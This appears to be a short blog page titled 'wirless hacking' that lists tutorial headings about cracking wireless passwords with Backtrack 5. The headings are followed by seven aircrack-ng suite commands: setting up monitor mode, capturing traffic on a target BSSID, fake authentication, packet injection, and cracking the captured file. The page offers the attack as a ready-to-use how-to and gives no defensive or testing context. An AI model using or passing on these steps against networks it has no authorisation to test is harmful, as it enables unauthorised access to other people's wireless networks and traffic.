wirless hacking

How to Hack Wireless Password With Backtrack 5


 

How to Hack Wireless Password With Backtrack 5

Backtrack 5 Automated wep Cracking With Gerix


Cracking WPA/WPA2 With BackTrack 5 R1




Steps:
1)airmon-ng 
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap

0 comments: